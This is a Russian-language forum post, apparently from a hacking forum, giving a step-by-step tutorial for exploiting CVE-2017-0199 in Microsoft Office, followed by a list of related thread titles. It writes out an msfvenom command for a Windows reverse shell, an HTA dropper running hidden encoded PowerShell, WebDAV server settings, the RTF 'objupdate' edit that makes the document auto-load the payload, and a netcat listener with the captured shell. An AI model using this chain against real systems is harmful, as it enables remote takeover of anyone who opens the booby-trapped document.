Тестирования уязвимости в продукции Microsoft Office - CVE-2017-0199

Admin

Администратор
Эксплуатация CVE-2017-0199
Благодаря публикации FireEye стало известно об эксплуатации CVE-2017-0199 в различных компаниях по распространению вирусов (например Dridex).
Уязвимость заключается в использовании OLEv2-ссылок в теле документа.
Итак, а что это за объекты OLEv2? Это в основном объект (файл), который мы включаем в наш файл, и его содержимое будет загружено в документ при открытии. Короче: файл внутри файла.

Этап 1:
На первом этапе мы создадим HTA-файл (это тип файла, который является по факту html-приложением, которое способно интерпретировать Jscript\Vbscript-код).
Для примера мы назовем файл myhta.hta:
HTML:
<!DOCTYPE html>
<html>
 <head>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
  <title>CVE-2017-0199</title>
  <script language="VBScript">
   ТУТ БУДЕТ ВАШ КОД
  </script>
  <hta:application id="oHTA" applicationname="CVE-2017-0199" application="yes">
  </hta:application>
 </head>
 <body>
 </body>
</html>
Итак, это базовое приложение HTA, без какого-либо пейлоада.
Теперь нам нужно сгенерировать наш vbscript-код для включения в этот hta-файл.
Код:
# msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.1.213 LPORT=21747 -f hta-psh
В результате мы получаем следующий пейлоад:
Код:
<script language="VBScript">
Set jkq = CreateObject("Wscript.Shell")
Set bMB = CreateObject("Scripting.FileSystemObject")
If bMB.FileExists(jkq.ExpandEnvironmentStrings("%PSModulePath%")+"..\powershell.exe") Then
jkq.Run "powershell.exe -nop -w hidden -e aQBmACgAWw...ACkAOwA="
End If
</script>
Добавьте этот скрипт в hta-файл:
HTML:
<!DOCTYPE html>
<html>
 <head>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
  <title>CVE-2017-0199</title>
  <script language="VBScript">
   Set jkq = CreateObject("Wscript.Shell")
   jkq.Run "powershell.exe -nop -w hidden -e aQBmACgAWw...ACkAOwA="
  </script>
  <hta:application id="oHTA" applicationname="CVE-2017-0199" application="yes">
  </hta:application>
 </head>
 <body>
 </body>
</html>
Обратите внимание, что мы удалили некоторые строки из нашего скрипта, поскольку в данном случае в них нет необходимости для запуска powershell (Если кто-нибудь знает, почему, пожалуйста, дайте мне знать).

Итак, теперь у нас есть наш hta-файл, с нашим пейлоадом в виде реверсивного шелла.

Этап 2:
Следующим шагом на необходимо создать простой RTF-документ используя Windows Word, с любым содержимым внутри. В этом примере вы можете написать "Это просто тест!" и сохранить с названием myrtf.rtf.

Хорошо. Теперь у вас имеется 2 документа, которые вы должны загрузить на веб-сервер:
Код:
/var/www/html/ms# ls
myhta.hta myrtf.rtf

Этап 3:
Настройте сервер Apache в качестве WebDAV-сервиса:
Код:
#a2enmod dav
#a2enmod dav_fs
#a2enmod dav_lock
#a2enmod headers
#service apache2 restart
Далее мы добавим заголовок content-type application/rtf для всех файлов в нашем каталоге /ms и разрешим выполнение запроса PROPFIND, который будет выполнять Microsoft Office.

Для этого откройте файл 000-default.conf расположенный по адресу /etc/apache2/sites-enabled и добавьте в конце следующие строки:
Код:
<Directory /var/www/html/ms/>
  Header set Content-Type "application/rtf"
</Directory>
<Directory />
  Dav on
</Directory>
После всех изменений не забудьте перезапустить apache сервер:
Код:
service apache2 restart

Этап 4:
Теперь нам нужно создать другой RTF-файл (тот самый, который мы отправим учебной жертве) и вставить в него ссылку на внешний rtf-файл.

Создайте документ с именем research-doc.rtf и добавьте в него объект:
Английская локализация: Insert -> Object ("Create from File")
Русская локализация: Вставка -> Объект ("Создание из файла")

В имени файла добавьте URL-адрес (http://192.168.XXX.XXX/ms/myrtf.rtf) и отметьте "Связь с файлом/Link to file":
1

Сохраните файл.

Этап 5:
После того, как вы создали файл, вам необходимо отредактировать его для автоматической загрузки OLE-объекта, а именно добавить objupdate между objautlink and rsltpict в файле research-doc.rtf.

Для этого откройте файл через SublimeText или Notepad++, найдите object и проведите следующую операцию:
замените строку:
Код:
\object\objautlink\rsltpict
на:
Код:
\object\objautlink\objupdate\rsltpict
Итак, теперь у нас есть наш файл esearch-doc.rtf, который указывает на объект myrtf.rtf, но мы хотим, чтобы он фактически указывал на наш hta-файл.
Переходим к следующему шагу.

Этап 6:
Для этого нам нужно заменить содержимое myrtf.rtf содержимым myhta.hta, а затем изменить заголовок application content-type на hta.

Производим замену содержимого (чтение myhta.hta и перезапись myrtf.rtf):
Код:
/var/www/html/ms# cat myhta.hta > myrtf.rtf
Отредактируйте конфигурационный файл 000-default.conf, заменив:
Код:
Header set Content-Type "application/rtf"
на:
Header set Content-Type "application/hta"
После всех изменений не забудьте перезапустить apache сервер:
Код:
service apache2 restart

Этап 7:
Создайте слушающий порт на вашем сервере и откройте документ на удаленном компьютере, имеющим соединение до сервера research-doc.rtf:
Код:
# nc -nlvp 21747
Код:
listening on [any] 21747
connect to [192.168.1.213] from (UNKNOWN) [192.168.1.217] 58028
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
whoami
desktop-hae3iae\buhletxr
Готово. Мы получили шелл.

Примечание: если вам не нравится расширение .rtf, в вашем окончательном документе research-doc.rtf - переименуйте его, например в файл с расширением .doc, он также будет работать
 
Похожие темы
Admin UFOLABSNEWS Мошенники используют режим тестирования приложений для обхода отзывов в Google Play. Новости в сети 0
Anorali TIDoS-Framework: платформа для тестирования на проникновение веб-приложений Полезные статьи 6
АнАлЬнАя ЧуПаКаБрА Интересно ReCaptchaTester - СОФТ для тестирования CapMonster / XEvil Готовый софт 0
G Portia - Автоматизация тестирования на проникновение Уязвимости и взлом 0
G WPSeku-простой сканер тестирования Wordpress Уязвимости и взлом 0
G Xerosploit - инструментарий для тестирования проникновение Уязвимости и взлом 0
L Книга по установке кали и тестирования на проникновения Полезные статьи 8
B Введение в раздел Практика тестирования на проникновение "Разведка и сбор информации" Уязвимости и взлом 0
Admin UFOLABSNEWS Уязвимости в продуктах Zyxel и Veeam активно эксплуатируются злоумышленниками. Новости в сети 0
Admin UFOLABSNEWS Две критические уязвимости RCE угрожают сотням тысяч сайтов на WordPress. Новости в сети 0
Admin UFOLABSNEWS Cisco предупреждает о новой уязвимости нулевого дня в ISE с оценкой 10.0 по шкале CVSS. Новости в сети 0
Admin UFOLABSNEWS Acronis предупредила об эксплуатации уязвимости в плагине Backup для cPanel. Новости в сети 0
Admin UFOLABSNEWS CISA предупредила об использовании уязвимости VMware ransomware-группами. Новости в сети 0
Admin UFOLABSNEWS Китайские хакеры используют уязвимости Chrome и Windows для распространения бэкдора GRIMWEDGE. Новости в сети 0
Admin UFOLABSNEWS Хакеры используют уязвимости в JFrog для внедрения Rust-бэкдора. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники используют уязвимости Cisco FMC для распространения ransomware Qilin. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники использовали уязвимости в JFrog Artifactory для получения прав администратора. Новости в сети 0
Admin UFOLABSNEWS Кибершпионы используют новый набор эксплойтов BlueMoon для атак через уязвимости в Windows и Chrome. Новости в сети 0
Admin UFOLABSNEWS Check Point устранила две критические уязвимости в VPN-сертификатах. Новости в сети 0
Admin UFOLABSNEWS Chrome снова атакуют через уязвимости в движке V8. Google закрыла седьмой zero-day за год. Новости в сети 0
Admin UFOLABSNEWS Skullcandy Dime 3 подвержены уязвимости Bluetooth. Новости в сети 0
devqp Статья Критические уязвимости SIM-карт: методы взлома и защита Уязвимости и взлом 0
Admin UFOLABSNEWS SAP предупреждает о критической уязвимости 'OVERPASS' в ядре системы. Новости в сети 0
Admin UFOLABSNEWS OpenAI подтвердила, что GPT-6 Astra способна находить уязвимости нулевого дня. Новости в сети 0
Admin UFOLABSNEWS Хакеры начали атаковать корпоративные VPN-шлюзы NetScaler в течение суток после публикации кода уязвимости. Новости в сети 0
Admin UFOLABSNEWS Хакеры используют уязвимости в MikroTik RouterOS для захвата роутеров. Новости в сети 0
Admin UFOLABSNEWS ConnectWise предупреждает о новой уязвимости в ScreenConnect. Новости в сети 0
Admin UFOLABSNEWS N-able выпустила экстренный патч для критической уязвимости в платформе N-central. Новости в сети 0
Admin UFOLABSNEWS Обнаружены критические уязвимости в VMware Workstation и Fusion. Новости в сети 0
Admin UFOLABSNEWS Google выпустила обновление Chrome для устранения активно эксплуатируемой уязвимости в V8. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники эксплуатируют две уязвимости нулевого дня в устройствах SonicWall SMA 1000. Новости в сети 0
Admin UFOLABSNEWS В GeoNetwork обнаружены четыре уязвимости, угрожающие серверам государственных геопорталов. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники используют критические уязвимости в Langflow и Ruby on Rails для сбора данных и удалённого доступа. Новости в сети 0
devqp Статья Уязвимости генерации Unpredictable Number в EMV и методы извлечения ARQC Уязвимости и взлом 0
Admin UFOLABSNEWS Обнаружены две уязвимости в роботе Unitree G1 EDU, позволяющие выполнять произвольный код с правами root. Новости в сети 0
Admin UFOLABSNEWS В ServiceNow обнаружены три критические уязвимости с максимальным уровнем опасности. Новости в сети 0
Admin UFOLABSNEWS Китайские роутеры ZBT содержат скрытые уязвимости, позволяющие злоумышленникам получить полный доступ. Новости в сети 0
devqp Статья Эксплуатация уязвимости Magento CVE-2022-24086: RCE через кассу Уязвимости и взлом 0
Admin UFOLABSNEWS В Next.js обнаружены критические уязвимости, позволяющие выполнение произвольного кода. Новости в сети 0
Admin UFOLABSNEWS Cisco предупредила об уязвимости в Secure Firewall Management Center, которую активно эксплуатируют. Новости в сети 0
Admin UFOLABSNEWS Модели OpenAI использовали уязвимости Artifactory для выхода в интернет. Новости в сети 0
devqp Статья Эксплуатация уязвимости PHP привела к компрометации LockBit Уязвимости и взлом 0
Admin Интересно Коммерческая тайна под защитой. Cisco научила нейросети искать уязвимости без интернета. Новости в сети 0
Admin Интересно Estée Lauder сообщает об утечке данных из-за уязвимости в Oracle E-Business Suite. Новости в сети 0
Admin Интересно Выпущено обновление 7-Zip для устранения уязвимости удалённого выполнения кода. Новости в сети 0
Admin Интересно В WordPress обнаружены критические уязвимости wp2shell, позволяющие выполнять удалённый код. Новости в сети 0
Admin Интересно Исследователь опубликовал эксплойт для уязвимости в Windows после обновления Microsoft. Новости в сети 0
Admin Интересно Microsoft выпустила рекордное количество исправлений, включая две активно эксплуатируемые уязвимости. Новости в сети 0
Admin UFOLABSNEWS CISA подтвердила атаки через уязвимости в JoomShaper и Langflow. Новости в сети 0
devqp Статья Эксплуатация уязвимости Remote Code Execution в Magento (CVE-2022-24086) Уязвимости и взлом 0

Название темы